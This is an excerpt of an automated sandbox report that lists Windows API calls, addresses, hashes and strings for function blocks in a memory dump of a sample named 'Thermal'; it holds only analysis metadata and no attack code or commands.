                                                      • API String ID: 842720411-0
                                                      • Opcode ID: 845f0fd37ebd620f29943eb56c34e06f6a77c3c19f969c974d54c96592715d5b
                                                      • Instruction ID: 205fd39b4fd675de3aa9a91b20fab726d818ca90de2820334217914b3278000c
                                                      • Opcode Fuzzy Hash: 845f0fd37ebd620f29943eb56c34e06f6a77c3c19f969c974d54c96592715d5b
                                                      • Instruction Fuzzy Hash: 240169B0290204BFDB214FAADC8DD6B7BBDEF8A354B104629F849C2220DF31DC50CA60
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0018581B
                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00185829
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00185831
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0018583B
                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00185877
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: 1852203ce360db1f95419b88b57e868c68f1373557b2f5ecd848796bdff0dda4
                                                      • Instruction ID: c4fbe120d9f8db949507e27fed45da0fcc91c26d1d106ac2d3369cac605273f9
                                                      • Opcode Fuzzy Hash: 1852203ce360db1f95419b88b57e868c68f1373557b2f5ecd848796bdff0dda4
                                                      • Instruction Fuzzy Hash: 8C016D31C01A1DDBCF04AFEAD8489EEBB79FB0D711F414196E401B2140DB30D6A4CBA1
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00177C62,80070057,?,?,?,00178073), ref: 00177D45
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00177C62,80070057,?,?), ref: 00177D60
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00177C62,80070057,?,?), ref: 00177D6E
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00177C62,80070057,?), ref: 00177D7E
                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00177C62,80070057,?,?), ref: 00177D8A
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: 459a99ecb652f776a0c80cae216e2dd2cef346d16734eadd902ed631c67c46b5
                                                      • Instruction ID: ecc954300f62e43af2e99374abe83031dd51dd4ea55c2a9b4d1942d95d8e5e81
                                                      • Opcode Fuzzy Hash: 459a99ecb652f776a0c80cae216e2dd2cef346d16734eadd902ed631c67c46b5
                                                      • Instruction Fuzzy Hash: 5B017172A05214ABDB214F94DC44BAA7BBDEF48791F158114FD0CD6260E771DE40CBE0
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00178CDE
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00178CE8
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00178CF7
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00178CFE
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00178D14
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: d9ea9d352081d668f96161511592e5aa429a2f8dddb134f076830eec24e8001d
                                                      • Instruction ID: ead0c1f15cf50c1341e719eba903981930ceecef81c4c72d9b0a4d01ee8a024b
                                                      • Opcode Fuzzy Hash: d9ea9d352081d668f96161511592e5aa429a2f8dddb134f076830eec24e8001d
                                                      • Instruction Fuzzy Hash: D6F04F75244204AFEB221FE5DCCDE673BADEF4D7A4B108625F949C6190CB61DC81DB60
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00178D3F
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00178D49
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00178D58
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00178D5F
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00178D75
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: 15f0c7ace405a1f54f5f13087b634c3841928d02c2d8a76d9e937b753744726d
                                                      • Instruction ID: f3f7b17e2d5906f08c8839acdc60b240a04d2b51cd14fb9e839fb2e09f6519ba
                                                      • Opcode Fuzzy Hash: 15f0c7ace405a1f54f5f13087b634c3841928d02c2d8a76d9e937b753744726d
                                                      • Instruction Fuzzy Hash: 14F04F71290204AFEB221FA9EC8CF673BADEF49794F144215F949C6190DB61DD81DB60
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0017CD90
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0017CDA7
                                                      • MessageBeep.USER32(00000000), ref: 0017CDBF
                                                      • KillTimer.USER32(?,0000040A), ref: 0017CDDB
                                                      • EndDialog.USER32(?,00000001), ref: 0017CDF5
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: 0accb9a548423e2f7caa905c4c262bcdb084a57124c78894816fccc621674264
                                                      • Instruction ID: fb830bd1f22ad21480b86da98f0d8a51da459b6ae04b32428be8b1e6e6a69e33
                                                      • Opcode Fuzzy Hash: 0accb9a548423e2f7caa905c4c262bcdb084a57124c78894816fccc621674264
                                                      • Instruction Fuzzy Hash: 1C018630500704ABEB359B60DD4EBA77B78FB08705F00476DF596A14E1DBF0A9948BC0
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 0012179B
                                                      • StrokeAndFillPath.GDI32(?,?,0015BBC9,00000000,?), ref: 001217B7
                                                      • SelectObject.GDI32(?,00000000), ref: 001217CA
                                                      • DeleteObject.GDI32 ref: 001217DD
                                                      • StrokePath.GDI32(?), ref: 001217F8
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: ff620f2d1e304be56d3ae06a0d90d38184a45c3b2ef224f876e396c0168c0f65
                                                      • Instruction ID: 064a3ca2d236505d8d3d0190e044dd047afb632bfb5c0147aa45045c9c80e35e
                                                      • Opcode Fuzzy Hash: ff620f2d1e304be56d3ae06a0d90d38184a45c3b2ef224f876e396c0168c0f65
                                                      • Instruction Fuzzy Hash: C2F0E130008248FBEB269F95EC8CB5D3FA4A764365F148314F429599F0D73149E5DF10
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0018CA75
                                                      • CoCreateInstance.OLE32(001B3D3C,00000000,00000001,001B3BAC,?), ref: 0018CA8D
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      • CoUninitialize.OLE32 ref: 0018CCFA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                      • String ID: .lnk
                                                      • API String ID: 2683427295-24824748
                                                      • Opcode ID: 7c857d35f89aa43a403b858a1b46db42b866a505bf24dfb13c2a36049837d10a
                                                      • Instruction ID: 2972cb2a7fb16e4271e3685af18d3a07ebaad73a943360676736a063e0809824
                                                      • Opcode Fuzzy Hash: 7c857d35f89aa43a403b858a1b46db42b866a505bf24dfb13c2a36049837d10a
                                                      • Instruction Fuzzy Hash: 22A13C71104215AFD300EF64DC91EABB7E8FFA4714F40491CF15597292EB70EA49CBA2
                                                      APIs
                                                        • Part of subcall function 00140FE6: std::exception::exception.LIBCMT ref: 0014101C
                                                        • Part of subcall function 00140FE6: __CxxThrowException@8.LIBCMT ref: 00141031
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 00131680: _memmove.LIBCMT ref: 001316DB
                                                      • __swprintf.LIBCMT ref: 0012E598
                                                      Strings
                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0012E431
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                      • API String ID: 1943609520-557222456
                                                      • Opcode ID: a136b81df5213781fab21002f362be4a11da2325e3faa90859bf9722c9f937ba
                                                      • Instruction ID: 146b7fb584addc942300ebc597d5c00fc134210cdbf803319981e0485ede9f53
                                                      • Opcode Fuzzy Hash: a136b81df5213781fab21002f362be4a11da2325e3faa90859bf9722c9f937ba
                                                      • Instruction Fuzzy Hash: C691AE71118311AFC718EF24D895C6EB7E9EFA5700F40491DF486972A1EB30EE54CB92
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 001452CD
                                                        • Part of subcall function 00150320: __87except.LIBCMT ref: 0015035B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__87except__start
                                                      • String ID: pow
                                                      • API String ID: 2905807303-2276729525
                                                      • Opcode ID: 940e33512a100525062d112fa857e3e81b28059b8a5f30bfed52d500d172174f
                                                      • Instruction ID: f58b0fb1c16d86a695174e0d738aa5d0c3336346d4543d9489eeac211cf57108
                                                      • Opcode Fuzzy Hash: 940e33512a100525062d112fa857e3e81b28059b8a5f30bfed52d500d172174f
                                                      • Instruction Fuzzy Hash: D4519D61A09A01C7CB166F54C94176E2B95AB04B52F208D59E8E18E6B7EFB48CCCDA42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #$+
                                                      • API String ID: 0-2552117581
                                                      • Opcode ID: 53db46a055c03380cdc48ee5a41d7ab87af9c5cb1a5c39d5aa47c799a180cb09
                                                      • Instruction ID: 40d7b45d35e4a2e03987c12c9dcc4d48387de7976fccdebb9808a4822ecec64e
                                                      • Opcode Fuzzy Hash: 53db46a055c03380cdc48ee5a41d7ab87af9c5cb1a5c39d5aa47c799a180cb09
                                                      • Instruction Fuzzy Hash: 3D512375504345DFDF16DF69C880AFA7BB4EF6A320F148055EC95AB2A0D734AC82CB62
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memset$_memmove
                                                      • String ID: ERCP
                                                      • API String ID: 2532777613-1384759551
                                                      • Opcode ID: 803103e9d2b078c203ceb994bf586130a36e4d2614391bfe7c8bf7ee3c608a8f
                                                      • Instruction ID: 69732a6b9ba2fcaa2af1535d09fdc271776ea2a214ae8d0399ee42ef525aa9f1
                                                      • Opcode Fuzzy Hash: 803103e9d2b078c203ceb994bf586130a36e4d2614391bfe7c8bf7ee3c608a8f
                                                      • Instruction Fuzzy Hash: B45193B190070A9BDB28CF65D8817AABBF8FF04714F24856EF54ADB251E770D685CB80
                                                      APIs
                                                        • Part of subcall function 00181CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00179E4E,?,?,00000034,00000800,?,00000034), ref: 00181CE5
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0017A3F7
                                                        • Part of subcall function 00181C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00179E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00181CB0
                                                        • Part of subcall function 00181BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00181C08
                                                        • Part of subcall function 00181BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00179E12,00000034,?,?,00001004,00000000,00000000), ref: 00181C18
                                                        • Part of subcall function 00181BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00179E12,00000034,?,?,00001004,00000000,00000000), ref: 00181C2E
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0017A464
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0017A4B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: 1eba8b33b1a373979134ee87afb1da287a2e8a5bffae98d9261041c88ad28d0b
                                                      • Instruction ID: e8ae71f2523720a6a1b7e649594020619afb7033257d32c0b4cd6827e474897e
                                                      • Opcode Fuzzy Hash: 1eba8b33b1a373979134ee87afb1da287a2e8a5bffae98d9261041c88ad28d0b
                                                      • Instruction Fuzzy Hash: F441287294021CBEDB10EBA4CD85ADEBBB8AF59300F048195FA55A7180DB716F85CBA1
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001A7A86
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001A7A9A
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 001A7ABE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: SysMonthCal32
                                                      • API String ID: 2326795674-1439706946
                                                      • Opcode ID: d98a2470fcb5f75faf98e1e9f3b3b62fba80cc7dae09e921d8aa510236a35701
                                                      • Instruction ID: 0f66ee56bab088ac4fb1d6492e322694189bf8665d0fec40ace7b0db250c7ce0
                                                      • Opcode Fuzzy Hash: d98a2470fcb5f75faf98e1e9f3b3b62fba80cc7dae09e921d8aa510236a35701
                                                      • Instruction Fuzzy Hash: 4D21BF32610218BFDF218F50CC82FEE3B69EB49724F150214FE156B1D0DBB1A9948BA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001A826F
                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001A827D
                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001A8284
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 4014797782-2298589950
                                                      • Opcode ID: cbcdde1854d6bb43052fabe7b72992b72fdd90ca7a35b71de01955c005324942
                                                      • Instruction ID: 44e0283d445e4dd943134a9fadab528a0ac927d55aeb4b197a2b30cda04a726a
                                                      • Opcode Fuzzy Hash: cbcdde1854d6bb43052fabe7b72992b72fdd90ca7a35b71de01955c005324942
                                                      • Instruction Fuzzy Hash: 5A2192B5604249AFEB11DF54DCC5D7B37EDEB5A354B040159FA019B2A1CB70EC51CBA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001A7360
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001A7370
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 001A7395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: 5aa93c06f29b5511a19ebf233500c7caa567d3ab1795387a4c7b8b1887104366
                                                      • Instruction ID: eacd7073c2aa40f41fafbf08fe1f7c6425e965766962a9be892b55c96e469391
                                                      • Opcode Fuzzy Hash: 5aa93c06f29b5511a19ebf233500c7caa567d3ab1795387a4c7b8b1887104366
                                                      • Instruction Fuzzy Hash: D521B036614118BFDF128F54DC85EBF37AAEF8A760F128124FA009B1D0D771AC519BA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001A7D97
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001A7DAC
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 001A7DB9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
